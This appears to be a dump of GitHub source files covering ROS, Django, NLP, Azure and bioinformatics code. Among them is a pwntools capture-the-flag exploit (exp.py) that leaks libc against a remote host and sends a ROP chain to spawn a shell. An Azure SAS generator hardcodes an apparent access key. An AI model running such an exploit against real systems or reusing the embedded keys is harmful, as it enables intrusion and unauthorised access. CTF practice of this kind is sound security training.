ChangeItemValues(BoardID[count],ItemID,\"status\",StatDump(z))\n ChangeItemValues(BoardID[count],ItemID,\"date\",DateDump(ProdDate))\n ChangeItemValues(BoardID[count],ItemID,\"date4\",DateDump(SchedDate))\n print(\"update\")\n print(StatDump(z)) \n \n count += 1\n \ninput(\"Finished\")\n","repo_name":"aajjbb613/Insight_to_Monday","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":12526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70886135047","text":"import setuptools\n\n# Открытие README.md и присвоение его long_description.\nwith open(\"README.md\", \"r\") as fh:\n\tlong_description = fh.read()\n\n# Определение requests как requirements для того, чтобы этот пакет работал. Зависимости проекта.\nrequirements = [\"requests<=2.21.0\", \"selenium\"]\n\n# Функция, которая принимает несколько аргументов. Она присваивает эти значения пакету.\nsetuptools.setup(\n\tname=\"dnevniklib\",\n\tversion=\"1.0\",\n\tauthor=\"Ivan Kriventsev\",\n\tauthor_email=\"dirtyhornet277@outlook.com\",\n\tdescription=\"Library for automated work with dnevnik.mos.ru\",\n\n\tlong_description=long_description,\n\tlong_description_content_type=\"text/markdown\",\n\turl=\"https://github.com/dirtyhornet277/dnevniklib\",\n\tpackages=setuptools.find_packages(),\n\tclassifiers=[\n\t],\n\tpython_requires='>=3.6',\n)\n","repo_name":"DnevnikLib/dnevniklib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"28516499015","text":"#!/usr/bin/env python3\n\n# import libraries\nimport rospy\nimport cv2\nimport numpy as np\nimport car_plate_number_test\nimport sensor_msgs\nfrom geometry_msgs.msg import PoseStamped\nfrom test_pkg.msg import CarData\nfrom cv_bridge import CvBridge\nimport cv2\n\nclass License_Detect:\n def __init__(self):\n print(\"Start\")\n rospy.init_node(\"car_plate_number\")\n rospy.Subscriber(\"/camera/rgb/image_raw\",sensor_msgs.msg.Image,self.ImageCallback)\n rospy.Subscriber('/move_base_simple/goal',PoseStamped,self.start)\n self.car_msg_pub = rospy.Publisher('/Car_Data',CarData,queue_size=1)\n self.image = None\n self.oldval = 0\n self.bridge = CvBridge()\n rospy.spin()\n \n def start(self,data):\n print(\"success\")\n car_number , img ,detected= car_plate_number_test.find_number()\n # print(car_number)\n\n carmsg = CarData()\n\n if detected:\n carmsg.car_number_plate = car_number\n carmsg.height = img.shape[0]\n carmsg.width = img.shape[1]\n carmsg.data = self.bridge.cv2_to_imgmsg(img).data\n carmsg.detected = detected\n self.car_msg_pub.publish(carmsg)\n else:\n carmsg.car_number_plate = \" \"\n carmsg.detected = detected\n\n self.car_msg_pub.publish(carmsg)\n\n\n# 집에 가고 싶다...\n\n def ImageCallback(self, data):\n # print(data.height) # value : 1080\n # print(data.width) # value : 1920\n # print(data.encoding) # value : rgb8\n # print(data.is_bigendian) # value : 0\n # print(data.step) # value : 5760\n bridge = CvBridge()\n # cv_image = bridge.imgmsg_to_cv2(image_message, desired_encoding='passthrough')\n img_ori = bridge.imgmsg_to_cv2(data,'bgr8')\n # print(img_ori.shape)\n self.image = cv2.resize(img_ori, (640, 480), interpolation=cv2.INTER_CUBIC)\n # self.image = img_ori.copy()\n # print(self.image[0][0]) # row : 1080 col : 1920\n # print(np.sum(self.image))\n cur = np.sum(self.image)\n print(cur - self.oldval if cur > self.oldval else 0)\n self.oldval = cur\n\n\n\n cv2.imshow(\"Image window\", self.image)\n cv2.waitKey(3)\n # print(car_plate_number_test.find_number(data))\n \n \nif __name__ ==\"__main__\":\n start = License_Detect()\n ","repo_name":"chunggilan/Autonomous-Multi-Robot-Parking-System","sub_path":"test_pkg/scripts/car_plate_ros.py","file_name":"car_plate_ros.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"27893530174","text":"#!/usr/bin/env python\n\nfrom pwn import *\n\ncontext.log_level = \"debug\"\n\nelf = \"./hacker_system_ver2\"\n\nunsorted_bin_off = 0x3c4b78\nsystem_off = 0x45390\nbin_sh_off = 0x18cd57\n\npop_rdi_ret = 0x400fb3\n\n#p = process(elf)\np = remote(\"111.230.149.72\", 10008)\n\ndef add(name, age, length, intro):\n p.recvuntil(\"> \")\n p.sendline(\"1\")\n p.recvuntil(\"input the hacker's name:\")\n p.sendline(name)\n p.recvuntil(\"input the hacker's age:\")\n p.sendline(str(age))\n p.recvuntil(\"input the introduce's length:\")\n p.sendline(str(length))\n p.recvuntil(\"input the intro:\")\n p.send(intro)\n\ndef printh(length, name):\n p.recvuntil(\"> \")\n p.sendline(\"2\")\n p.recvuntil(\"input name length:\")\n p.sendline(str(length))\n p.recvuntil(\"input hacker's name:\")\n p.send(name)\n \ndef delete(length, name):\n p.recvuntil(\"> \")\n p.sendline(\"3\")\n p.recvuntil(\"input name length:\")\n p.sendline(str(length))\n p.recvuntil(\"input hacker's name:\")\n p.send(name)\n\n\nadd(\"A\", 1, 0x100, \"\\n\")\nadd(\"A\", 1, 0x3, \"123\")\n\ndelete(2, \"A\\n\")\n\nprinth(2, \"A\\n\")\n\np.recvuntil(\"intro:\")\nlibc_base = u64(p.recv(6).ljust(8, \"\\x00\"))-unsorted_bin_off\nlog.info(\"libc_base: \"+hex(libc_base))\n\nsystem_addr = libc_base+system_off\nbin_sh_addr = libc_base+bin_sh_off\n\npayload = p8(0)*0x38\npayload += p64(pop_rdi_ret)\npayload += p64(bin_sh_addr)\npayload += p64(system_addr)\nprinth(0x50, payload)\n\np.interactive()\n","repo_name":"0x3f97/pwn","sub_path":"hgame2018/hacker-system2/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"16"}
+{"seq_id":"1258608152","text":"soma = 0\n\nnum1 = int(input())\nnum2 = int(input())\n\nif num1 >= num2:\n maior = num1\n menor = num2\nelse:\n maior = num2\n menor = num1\n\nif maior % 2 == 0:\n maior -= 1\nelse:\n maior -= 2\n\nwhile maior > menor:\n soma += maior\n maior -= 2\n\nprint(soma)","repo_name":"niverton-felipe/URI_PYTHON","sub_path":"1071.py","file_name":"1071.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74408158087","text":"from django.urls import reverse\nfrom rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom django.db import transaction\n\nclass PostViewTest(APITestCase):\n def setUp(self):\n self.register_url = reverse('register')\n self.post_list_url = reverse('posts')\n self.user_data = {\n 'username': 'testuser',\n 'email': 'test@example.com',\n 'password': 'testpassword'\n }\n\n\n # Step 1: Create a user by hitting the registration endpoint\n response = self.client.post(self.register_url, self.user_data, format='json')\n # print(response.data)\n # self.assertEqual(response.data['status'], status.HTTP_201_CREATED)\n self.token = response.data['data']['token']\n \n self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {self.token}')\n\n def create_single_post(self):\n post_data = {'title': 'title', 'body': 'body'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n return response\n\n def create_post(self):\n for i in range(5):\n post_data = {'title': f'title {i+1}', 'body': f'body {i+1}'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n\n def test_create_posts(self):\n for i in range(5):\n post_data = {'title': f'title {i+1}', 'body': f'body {i+1}'}\n\n response = self.client.post(self.post_list_url, post_data, format='json')\n \n response = self.client.get(self.post_list_url)\n # self.assertEqual(response.data['status'], status.HTTP_200_OK)\n self.assertEqual(len(response.data['data']), 5)\n\n\n def test_get_all_posts(self):\n self.create_post()#\n response = self.client.get(self.post_list_url)\n self.assertEqual(response.data['status'], status.HTTP_200_OK)\n self.assertEqual(len(response.data['data']), 5)\n\n def test_get_single_post(self):\n self.create_post()\n response = self.client.get(\"/api/posts/1\")\n self.assertEqual(response.data['status'], status.HTTP_200_OK)\n\n def test_update_post(self):\n self.create_post()\n response = self.client.put(\"/api/posts/1\",{'title':'updated title','body':'updated body'},format='json')\n self.assertEqual(response.data['status'], status.HTTP_200_OK)\n\n def test_delete_post(self):\n self.create_post()\n response = self.client.delete(\"/api/posts/1\")\n self.assertEqual(response.data['status'], status.HTTP_204_NO_CONTENT)\n \n","repo_name":"sarangkkl/blog_api","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"35687358540","text":"import csv\nimport re\nimport string\nfrom time import sleep\n\nfrom nltk import PorterStemmer\nfrom nltk.corpus import stopwords\n\n\ndef preprocess_emotions_script():\n print()\n print(\"*** ESECUZIONE IN BACKGROUND >>> Preprocessing delle emozioni in corso...\")\n sleep(0.2)\n # # # TOKENIZZAZIONE # # #\n emoticons_str = r\"\"\"\n (?:\n [:=;] # Eyes\n [oO\\-]? # Nose (optional)\n [D\\)\\]\\(\\]/\\\\OpP] # Mouth\n )\"\"\"\n\n regex_str = [\n emoticons_str,\n r'<[^>]+>', # HTML tags\n r'(?:@[\\w_]+)', # @-mentions\n r\"(?:\\#+[\\w_]+[\\w\\'_\\-]*[\\w_]+)\", # hash-tags\n r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs\n\n r'(?:(?:\\d+,?)+(?:\\.?\\d+)?)', # numbers\n r\"(?:[a-z][a-z'\\-_]+[a-z])\", # words with - and '\n r'(?:[\\w_]+)', # other words\n r'(?:\\S)' # anything else\n ]\n\n tokens_re = re.compile(r'(' + '|'.join(regex_str) + ')', re.VERBOSE | re.IGNORECASE)\n emoticon_re = re.compile(r'^' + emoticons_str + '$', re.VERBOSE | re.IGNORECASE)\n\n def tokenize(s):\n return tokens_re.findall(s)\n\n def preprocess(s, lowercase=False):\n tokens = tokenize(s)\n # if lowercase:\n # tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]\n return tokens\n\n punteggiatura = list(string.punctuation) ### La punteggiatura la teniamo in conto\n stop_words = stopwords.words('english') + punteggiatura\n ps = PorterStemmer()\n # # # ------------- # # #\n\n with open('text_emotion.csv', 'r') as emotion_file:\n reader = csv.reader(emotion_file, delimiter=',')\n for row in reader:\n content = row[3]\n emotion = row[1]\n # print(line)\n # print()\n content = re.sub(r\"(?:\\@|https?\\://)\\S+\", \"\", content)\n # content = re.sub(r\"http\\S+\", \"\", content)\n # print(\"TOKENIZZAZIONE TWEET [\",i,\"]\")\n # print(\"TESTO TWEET > \", preprocess(tweet)) # stampa dei token del testo dei tweets\n # print(\"\\n\")\n # i = i + 1\n # print(content)\n\n # lista dei termini senza le stop words (SW)\n content_prepro = [ps.stem(term) + \" \" for term in preprocess(content) if term not in stop_words]\n\n # print(content_prepro)\n # print()\n # print(emotion)\n\n with open('text_emotion_prepro.csv', 'a+', encoding='utf8') as file:\n file.writelines(content_prepro)\n file.writelines(\",\")\n file.writelines(emotion)\n file.write(\"\\n\")\n print(\"*** Completato! Puoi procedere...\\n\")","repo_name":"Andry92/emotional-film-advice","sub_path":"Preprocess_Emotions.py","file_name":"Preprocess_Emotions.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18471565575","text":"class Solution:\r\n def carFleet(self, target, position, speed):\r\n output, maximum = 0\r\n times = [float(target - p) / s for p, s in sorted(zip(position, speed),reverse = True)] \r\n for time in times:\r\n if time > maximum:\r\n maximum = time\r\n output += 1\r\n\r\n return output\r\n","repo_name":"KnightDanny/A2SV","sub_path":"Car Fleet.py","file_name":"Car Fleet.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9781558230","text":"from audioop import reverse\nimport json\nimport math\nfrom wsgiref import headers\nfrom xml.dom import ValidationErr\nfrom numpy import append\nfrom .models import Choice_Model, darmangar, info, darmanjo_form\nfrom django.core.paginator import Paginator\nfrom django.urls import reverse\nfrom django.shortcuts import render, HttpResponseRedirect, HttpResponse, get_object_or_404, get_list_or_404, redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import TemplateView, CreateView,FormView, DetailView\nfrom .forms import infoss, darmanjo_formss\nfrom .extentions.excel_validation import exel_reader\nimport xlrd\nfrom django.utils.crypto import get_random_string\nimport random\nfrom pypep import Pasargad, ApiError\nimport pandas as pd\nimport datetime\n\nclass home(TemplateView):\n template_name = \"forms/home.html\"\n\n\n\n#in yek method form baraye in ast ke file excel ra daryaft konad\ndef get_name(request):\n if request.method == 'POST':\n form = infoss(request.POST, request.FILES)\n if form.is_valid():\n upl = form.cleaned_data['upl']\n form.save()\n\n wb = xlrd.open_workbook(\"media/upload-file/\" + str(upl))\n sh = wb.sheet_by_index(0)\n columns = sh.ncols - 2\n num_rows = sh.nrows - 1\n print(num_rows)\n if sh.cell_value(0,0) == \"نام\" and sh.cell_value(0,1) == \"خانوادگی\" and sh.cell_value(0,2) == \"موبایل\" and sh.cell_value(0,3) == \"ایمیل\":\n for i in range(num_rows):\n the_slug = get_random_string(3,'0123456789') # 8 characters, only digits. \n the_slugs = get_random_string(3,'0123456789')\n m = str(the_slug) + \"-\" + str(the_slug)\n o = i + 1\n\n d = sh.cell_value(o,2)\n\n a = info.objects.create( mobile=d)\n return HttpResponse(\"فایل با موفقیت ثبت شد\")\n else:\n return HttpResponse(\"مشکلی در فایل وجود دارد احتمالا از قوانین فایل پیروی نکردید\")\n #return HttpResponseRedirect('home')\n else:\n form = infoss()\n\n return render(request, 'forms/form.html', {'form': form})\n\n\n\nclass Submit_Form(TemplateView):\n template_name = \"forms/submit.html\"\n\n\n\n\n#function form baraye form darmanjo\ndef detailsick(request, slug):\n deta = get_object_or_404(info, slug=slug)\n detas = info.objects.get(slug=slug)\n darm = None\n informations = None\n page_obj = None\n darms = []\n rel_info = None\n list_count =[]\n #form\n if request.method == \"POST\":\n form = darmanjo_formss(request.POST)\n a = request.POST\n if form.is_valid():\n global talk_about\n talk_about = form.cleaned_data['talk_about']\n form.save(commit=False)\n print(\"aa\"+str(rel_info))\n darm = darmangar.objects.filter(keyword__in=talk_about.split())\n count = darm.count()\n half_count = math.ceil(count/2)\n print(half_count)\n\n for x in range(half_count):\n list_count.append(x+1)\n\n print(list_count)\n print(darms)\n informations = darmanjo_form.objects.create(information=deta, talk_about=talk_about)\n else:\n form = darmanjo_formss()\n return render(request, \"forms/detailsick.html\", {'deta':deta,'detas':detas,'form':form,'darm':darm,'page_obj':page_obj,'darms':darms, 'list_count':list_count, 'informations':informations})\n\n#detail form\ndef detailform(request, slug, pk, id):\n #for url filter\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n fname = None\n lname = None\n deta = info.objects.filter(slug=slug)\n deta1 = info.objects.get(slug=slug)\n darman = get_object_or_404(darmangar, pk=pk)\n detass = info.objects.get(slug=slug)\n c = info.objects.get(slug=slug)\n #informations = darmanjo_form.objects.update(talk_about=detas,rel_info=darman, information = 
detas)\n informations = darmanjo_form.objects.filter(information__fname__icontains=deta1.fname, information__lname__icontains=deta1.lname,id=darmanjo_fo.id).update(rel_info=darman, information=detass)\n \n return render(request, 'forms/detailform.html', {'deta':deta,'darman':darman,'detass':detass,'darmanjo_fo':darmanjo_fo})\n\n\nclass Unsubmit_Payment(TemplateView):\n template_name = \"forms/Unsubmit.html\"\n\n#payment\ndef payment(request, slug,id):\n\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n date = datetime.datetime.now()\n global invoice_number\n payment_price = darmangar.objects.get(slug=slug)\n global amount\n amount = int(payment_price.price)\n print(payment_price)\n url = f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n pasargad = Pasargad(4916435, 2148370, url, 'cert.xml')\n payment_url = pasargad.redirect(\n amount=amount,\n invoice_number=random.randint(0, 9000000),\n invoice_date=str(date),\n )\n url = 'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n return HttpResponseRedirect(payment_url, url)\n\ndef check_transaction(request,slug,id):\n payment_price = darmangar.objects.get(slug=slug)\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n global amount\n amount = int(payment_price.price)\n print(payment_price)\n pasargad = Pasargad(4916435, 2148370, 'http://127.0.0.1:8000/home', 'cert.xml')\n print(\"okey\")\n TransactionReferenceID = request.GET.get('tref')\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n print(TransactionReferenceID)\n print(InvoiceNumber)\n print(InvoiceDate)\n try:\n response = pasargad.check_transaction(\n reference_id=TransactionReferenceID,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n \n with open('data.txt', 'a') as f:\n data = json.dumps(response)\n data1 = str(data)\n f.write(data1+\"\\n\")\n print(\"okey\")\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=amount,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n informations = darmanjo_form.objects.filter(id=darmanjo_fo.id).update(payment=True)\n print(\"sabt shod\")\n #informations = darmanjo_form.objects.create()\n return HttpResponseRedirect(reverse('form:home'))\n except Exception:\n return HttpResponseRedirect(reverse('form:Unsubmit'))\n\n\n #response = json.loads(response.read().decode('utf-8'))\n\n\n#f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n#f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{deta.pk}/{deta.fname}/{darmanjo_fo.id}/'\n\n\n\"\"\"\n if request.method == 'GET':\n informations = darmanjo_form.objects.filter(id=darmanjo_fo.id).update(payment=True)\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=amount,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n #informations = darmanjo_form.objects.create()\n return HttpResponse(\"okey\")\n except Exception:\n return HttpResponse(\"okey\")\n\"\"\"\n\"\"\"\n pasargad = Pasargad(4916435, 2148370, f'http://127.0.0.1:8000/home', 'cert.xml')\n response = pasargad.check_transaction(\n reference_id=request.GET['tref'],\n invoice_number=request.GET['iN'],\n invoice_date=request.GET['iD'],\n )\n with open('data.txt', 'a') as f:\n data = json.dumps(response)\n data1 = str(data)\n f.write(data1+\"\\n\")\n \n data = json.dumps(response)\n print(data)\n x = data.get(\"IsSuccess\")\n print(\"<--------------------------> \"+x)\n if x 
== \"True\":\n if request.method == 'GET':\n informations = darmanjo_form.objects.filter(information__fname__icontains=deta1.fname, information__lname__icontains=deta1.lname,id=darmanjo_fo.id).update(payment=True)\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=\"17000\",\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n #informations = darmanjo_form.objects.create()\n return HttpResponse(\"okey\")\n else:\n return HttpResponse(\"False\")\n\n\"\"\"","repo_name":"javadhoseeinzade/first-project","sub_path":"Forms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"33634441905","text":"#!/bin/python\nimport time\n#import urllib\nfrom urllib.parse import urlparse\nimport hmac\nimport hashlib\nimport base64\n\ndef get_auth_token(sb_name, eh_name, sas_name, sas_value):\n \"\"\"\n Returns an authorization token dictionary \n for making calls to Event Hubs REST API.\n \"\"\"\n uri = urlparse(f\"https://{sb_name}.servicebus.windows.net/{eh_name}\")\n \n sas = sas_value.encode('utf-8')\n expiry = str(int(time.time() + 10000))\n string_to_sign = f\"{uri}\\n{expiry}\".encode('utf-8')\n signed_hmac_sha256 = hmac.HMAC(sas, string_to_sign, hashlib.sha256)\n signature = urlparse(base64.b64encode(signed_hmac_sha256.digest()))\n return {\"sb_name\": sb_name,\n \"eh_name\": eh_name,\n \"token\":'SharedAccessSignature sr={}&sig={}&se={}&skn={}' \\\n .format(uri, signature, expiry, sas_name)\n }\n\nprint ( get_auth_token('sapps-eventdriven-servicebus', 'upper-case', 'listner', 'ZlgMkVC4TmEMpS8QFPth1TrdHC98mb1YL+ASbJuUQeU=')['token'] )\n\n","repo_name":"wkaczurba/wkaczurba.github.io","sub_path":"docs/azure/sas/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8541002866","text":"\"\"\"An example with GIF generation at the end. How cool is that!\n\nThis example requires the Moviepy library installed (pip install moviepy).\n\n\"\"\"\nfrom Bio import Entrez, SeqIO\nimport moviepy.editor as mpe\nfrom moviepy.video.io.bindings import mplfig_to_npimage\nimport matplotlib.pyplot as plt\nfrom dna_features_viewer import BiopythonTranslator, CircularGraphicRecord\n\n# DOWNLOAD THE PLASMID's RECORD FROM NCBI\n\nhandle = Entrez.efetch(\n db=\"nucleotide\", id=1473096477, rettype=\"gb\", retmode=\"text\"\n)\nrecord = SeqIO.read(handle, \"genbank\")\n\n# CREATE THE GRAPHIC RECORD WITH DNA_FEATURES_VIEWER\n\ncolor_map = {\n \"rep_origin\": \"yellow\",\n \"CDS\": \"orange\",\n \"regulatory\": \"red\",\n \"misc_recomb\": \"darkblue\",\n \"misc_feature\": \"lightblue\",\n}\ntranslator = BiopythonTranslator(\n features_filters=(lambda f: f.type not in [\"gene\", \"source\"],),\n features_properties=lambda f: {\"color\": color_map.get(f.type, \"white\")},\n)\ntranslator.max_line_length = 15\ngraphic_record = translator.translate_record(\n record, record_class=CircularGraphicRecord\n)\ngraphic_record.labels_spacing = 15\n\n# ANIMATE INTO A GIF WITH MOVIEPY\n\nduration = 5\n\n\ndef make_frame(t):\n top_nucleotide_index = t * graphic_record.sequence_length / duration\n graphic_record.top_position = top_nucleotide_index\n ax, _ = graphic_record.plot(figure_width=8, figure_height=11)\n ax.set_ylim(top=2)\n np_image = mplfig_to_npimage(ax.figure)\n plt.close(ax.figure)\n return np_image\n\n\nclip = mpe.VideoClip(make_frame, duration=duration)\nsmall_clip = clip.crop(x1=60, x2=-60, y1=100, y2=-100).resize(0.5)\nsmall_clip.write_gif(\"example_with_gif.gif\", fps=15)\n","repo_name":"Edinburgh-Genome-Foundry/DnaFeaturesViewer","sub_path":"examples/example_with_gif.py","file_name":"example_with_gif.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":508,"dataset":"github-code","pt":"16"}
+{"seq_id":"30584530761","text":"import os\n\nfrom datetime import datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support.select import Select\nimport time\nfrom common.file import CommonFile\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nclass BaseWebDriver:\n def __init__(cls):\n pass\n \n driver: WebDriver = None\n \n @classmethod\n def start_driver(cls):\n options = webdriver.ChromeOptions()\n options.add_argument('--lang=ja-JP')\n options.add_experimental_option('detach', True)\n cls.driver = webdriver.Chrome(ChromeDriverManager().install(),options=options)\n cls.driver.maximize_window()\n\n @classmethod\n def stop_driver(cls):\n cls.driver.quit()\n \n @classmethod\n def log_current_url(cls):\n print('current URL: ', cls.driver.current_url)\n\n @classmethod\n def get_screenshot(cls, id: str = \"temp\", \n prefix: str = \"\", suffix: str = \"\"):\n now = datetime.now()\n prefix = f\"{prefix}_\" if prefix else \"\"\n suffix = f\"_{suffix}\" if suffix else \"\"\n file_name = f\"{id}_{prefix}{now.strftime('%Y%m%d%H%M%S%f')}{suffix}.png\"\n dir_path = f\"{os.getcwd()}/screenshots/\"\n file_path = f\"{dir_path}{file_name}\"\n \n if not CommonFile.exists_path(dir_path):\n CommonFile.make_directory(dir_path)\n\n print(f'screenshot:{file_path}')\n screenshot = cls.driver.get_screenshot_as_png()\n \n CommonFile.make(file_path, screenshot, mode='wb+')\n\n @classmethod\n def switch_to_window(cls, index=-1):\n # seleniumが速すぎるため少し待つ\n cls.wait(0.5)\n \n windows = cls.driver.window_handles\n if index == -1:\n index = len(windows) - 1\n cls.driver.switch_to.window(windows[index])\n\n @classmethod\n def find_wait_clickable_element(cls, selector, wait_seconds=5):\n wait = WebDriverWait(cls.driver, wait_seconds)\n elm = wait.until(EC.element_to_be_clickable(selector))\n return elm\n \n @classmethod\n def find_wait_located_element(cls, selector, wait_seconds=10):\n wait = WebDriverWait(cls.driver, wait_seconds)\n elm = wait.until(EC.visibility_of_element_located(selector))\n return elm\n\n @classmethod\n def wait_loading(cls, selector, wait_seconds=10):\n # 判定用のエレメントが読込されるまで待機する\n wait = WebDriverWait(cls.driver, wait_seconds)\n elm = wait.until(EC.visibility_of_element_located(selector))\n \n @classmethod\n def wait(cls, wait_seconds=1):\n time.sleep(wait_seconds)\n \n @classmethod\n def clear_text(cls, elm: WebElement):\n elm.clear()\n \n @classmethod\n def input_text(cls, elm: WebElement, value):\n cls.clear_text(elm)\n elm.send_keys(value)\n \n @classmethod\n def input_text_add(cls, elm: WebElement, value):\n elm.send_keys(value)\n \n @classmethod\n def input_checkbox(cls, elm: WebElement, is_check: bool):\n is_checked = elm.is_selected()\n if is_checked == is_check:\n return\n elm.click()\n\n @classmethod\n def input_select(cls, elm: WebElement, value):\n Select(elm).select_by_value(value)\n \n @classmethod\n def input_radio(cls, name: str , value):\n elm_list = cls.driver.find_elements(by=By.NAME, value=name)\n elm = next(filter(lambda x:x.get_attribute('value') == value, elm_list))\n elm.click()\n \n @classmethod\n def select_radio(cls, elm: WebElement):\n elm.click()\n 
","repo_name":"kazuki-ikeya/seleniumSample","sub_path":"python/src/base/drivers/base_web_driver.py","file_name":"base_web_driver.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25821361110","text":"from uplogic.nodes import ULActionNode\nfrom uplogic.nodes import ULOutSocket\nfrom uplogic.ui import Canvas\n\n\nclass ULCreateUICanvas(ULActionNode):\n def __init__(self):\n ULActionNode.__init__(self)\n self.condition = None\n self._canvas = None\n self._done = False\n self.OUT = ULOutSocket(self, self._get_done)\n self.CANVAS = ULOutSocket(self, self._get_canvas)\n\n def _get_done(self):\n return self._done\n\n def _get_canvas(self):\n return self._canvas\n\n def evaluate(self):\n self._done = False\n if not self.get_input(self.condition):\n return\n self._canvas = Canvas()\n self._done = True\n \n","repo_name":"UPBGE/uplogic","sub_path":"uplogic/nodes/actions/createuicanvas.py","file_name":"createuicanvas.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"70651876167","text":"import asyncio\nimport nextcord\nfrom nextcord.ext import commands\nfrom typing import Union\n\nimport os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom constantes import tokenReact\n\ndef main() -> None:\n intentsBot = nextcord.Intents.default()\n intentsBot.members = True\n intentsBot.messages = True\n intentsBot.message_content = True\n bot = commands.Bot(command_prefix=\",\", help_command=None, intents = intentsBot)\n\n @bot.command(name=\"react\")\n async def react(ctx, *emojis: Union[nextcord.Emoji, str]):\n reference = ctx.message.reference\n\n if reference:\n msg = await ctx.channel.fetch_message(reference.message_id)\n for emoji in emojis:\n await msg.add_reaction(emoji)\n\n await ctx.message.delete()\n\n loop = asyncio.get_event_loop()\n loop.create_task(bot.start(tokenReact))\n loop.run_forever()\n\nmain()\n","repo_name":"fabnem12/squadro-bot","sub_path":"discordUtils/reactbot.py","file_name":"reactbot.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"}
+{"seq_id":"11890741601","text":"def from_snafu(snafu):\n return sum({ '=': -2, '-': -1, '0': 0, '1': 1, '2': 2 }[v] * (5 ** i) for i, v in enumerate(reversed(list(snafu))))\n\ndef to_snafu(number):\n # First convert the number to base 5\n digits = []\n while number:\n digits.append(number % 5)\n number //= 5\n digits.append(0)\n\n # Convert overflow 3s, 4s and 5s to next digit\n for i, digit in enumerate(digits):\n if digit > 2: digits[i] -= 5; digits[i+1] += 1\n\n if digits[-1] == 0: digits = digits[:-1]\n\n return ''.join([{ -2: '=', -1: '-', 0: '0', 1: '1', 2: '2' }[x] for x in reversed(digits)])\n\nwith open(\"./day25/input.txt\") as f:\n lines = f.read().splitlines()\n\npart1 = to_snafu(sum([from_snafu(x) for x in lines]))\nprint(part1)\n","repo_name":"craigfe/advent-of-code-2022","sub_path":"day25/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
